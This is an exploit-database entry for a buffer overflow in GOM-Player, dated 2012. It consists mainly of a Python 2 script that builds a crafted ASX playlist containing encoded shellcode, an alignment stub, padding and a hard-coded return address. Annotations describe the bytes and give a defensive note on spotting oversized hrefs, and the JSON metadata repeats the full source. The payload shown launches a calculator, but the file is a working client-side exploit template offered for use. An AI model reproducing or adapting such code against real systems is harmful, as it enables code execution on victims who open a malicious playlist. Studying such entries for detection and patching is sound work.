ID EXPLOITPACK:E3FCFFD66D6F55F78D45A21ADDA97DAD
Type exploitpack
Reporter Debasish
Modified 2012-01-21T00:00:00
Description
There was an error when sending a response from the m3u player list. Fortunately, these errors lead to buffer overflows.
This exploit is unstable and should only be used as a PoC. Once the list is imported, the player triggers the buffer overflow (BoF).
# Proof-of-concept generator (Python 2: it uses raw_input and the print
# statement). It writes a malformed ASX playlist whose <ref href> value is far
# longer than any legitimate URL; the page describes the result as a buffer
# overflow in the player once the list is imported.
# No affected version or CVE is listed on this page, so applicability has to be
# confirmed against the vendor's own advisories.
#
# Defensive note: the generated file is easy to recognise statically -- an ASX
# <ref> element whose href starts with "WWW." and continues for roughly 2 KB,
# largely 'A' (0x41) filler. Playlist handling or content filtering that caps
# href length would reject it.
raw_input("[*] Press Enter to generate the crafted ASX...")
# Total length of stub + payload + filler that follows the "WWW." prefix,
# i.e. everything in href before the two bytes labelled "eip" below.
size = 2046
# Payload as labelled by the author: WinExec of "Calc.exe" in a "Unicode"
# encoding; the literal consists only of printable ASCII letters and digits.
shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI"
shellcode += "AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl"
shellcode += "iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8"
shellcode += "qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4"
shellcode += "LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li"
shellcode += "z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN"
shellcode += "K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu"
shellcode += "48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA"
buff = ''
# Opening ASX markup; the href attribute is left open so the oversized string
# built below becomes its value.
buff += '<asx version = "3.0" ><entry><title>ArirangTV</title><ref href = "WWW.'
# Short instruction stub placed ahead of the payload. The per-line notes are
# the author's own description of what each byte group does.
# NOTE(review): the interleaved 0x41 bytes suggest the player widens the input
# to 16-bit characters before it is used -- inferred, not shown on this page.
align = "A" # align to first instruction
align += "\x55\x41\x58\x41" # push ebp, pop eax
align += "\x05\x11\x11" # add eax,11001100
align += "\x41" # align
align += "\x2d\x10\x11" # sub eax,11001000
align += "\x41" * 109 # padding
align += "\x40\x41\x40" # 2x inc eax
align += "\x41" # align
buff += align
buff += shellcode
# Fill the remainder of the `size`-byte region with 'A' so the next two bytes
# fall at a fixed offset from the start of the string.
buff += "\x41"*(size - len(align) - len(shellcode))
# Two bytes the author labels "eip". The author's note gives the resulting
# address as 0x005700d9; it is hard-coded, so it presumably matches only one
# build of the player, consistent with the "unstable" warning in the description.
buff += "\xd9\x57" # CALL EBP - 0x005700d9
# Trailing filler the author labels "top of the stack".
buff += "\x46"*2
buff += "\x47"*100
# Close the href attribute and the ASX document.
buff +='"/></entry></asx>'
# The output path is relative to the current working directory.
# NOTE(review): the handle is not closed if write() raises; a with-block would
# guarantee cleanup.
f = open('exploits/code/output/exploit.asx','w')
f.write(buff)
f.close()
# NOTE(review): the message says ".m3u", but the file written above is an .asx
# playlist.
print "[*] Crafted .m3u File generated"
#print "[*] Exit"
{"lastseen": "2020-04-01T19:04:17", "references": [], "description": "\nThere was an error when sending a response from the m3u player list. Fortunately, these errors lead to buffer overflows.\nThis exploit is unstable. It should only be used as a POC. Once the list is imported the player will execute the BoF\n", "edition": 1, "reporter": "Debasish", "exploitpack": {"type": "clientside", "platform": "windows"}, "published": "2012-01-21T00:00:00", "title": "GOM-Player", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:17", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:17", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-01-21T00:00:00", "id": "EXPLOITPACK:E3FCFFD66D6F55F78D45A21ADDA97DAD", "href": "", "viewCount": 1, "sourceData": "raw_input(\"[*] Press Enter to generate the crafted ASX...\")\nsize = 2046\n#Shellcode WinExec \"Calc.exe\" Unicode\nshellcode = \"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI\"\nshellcode += \"AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl\"\nshellcode += \"iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8\"\nshellcode += \"qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4\"\nshellcode += \"LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li\"\nshellcode += \"z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN\"\nshellcode += \"K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu\"\nshellcode += \"48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA\"\nbuff = ''\nbuff += '<asx version = \"3.0\" ><entry><title>ArirangTV</title><ref href = \"WWW.'\nalign = \"A\" # align to first instruction\nalign += \"\\x55\\x41\\x58\\x41\" # push ebp, pop eax\nalign += \"\\x05\\x11\\x11\" # add eax,11001100\nalign += \"\\x41\" # align\nalign 
+= \"\\x2d\\x10\\x11\" # sub eax,11001000\nalign += \"\\x41\" * 109 # padding\nalign += \"\\x40\\x41\\x40\" # 2x inc eax\nalign += \"\\x41\" # align\nbuff += align\nbuff += shellcode\nbuff += \"\\x41\"*(size - len(align) - len(shellcode))\n#eip\nbuff += \"\\xd9\\x57\" # CALL EBP - 0x005700d9\n # top of the stack\nbuff += \"\\x46\"*2\nbuff += \"\\x47\"*100\nbuff +='\"/></entry></asx>'\nf = open('exploits/code/output/exploit.asx','w')\nf.write(buff)\nf.close()\nprint \"[*] Crafted .m3u File generated\"\n#print \"[*] Exit\" \n", "cvss": {"score": 0.0, "vector": "NONE"}}
{}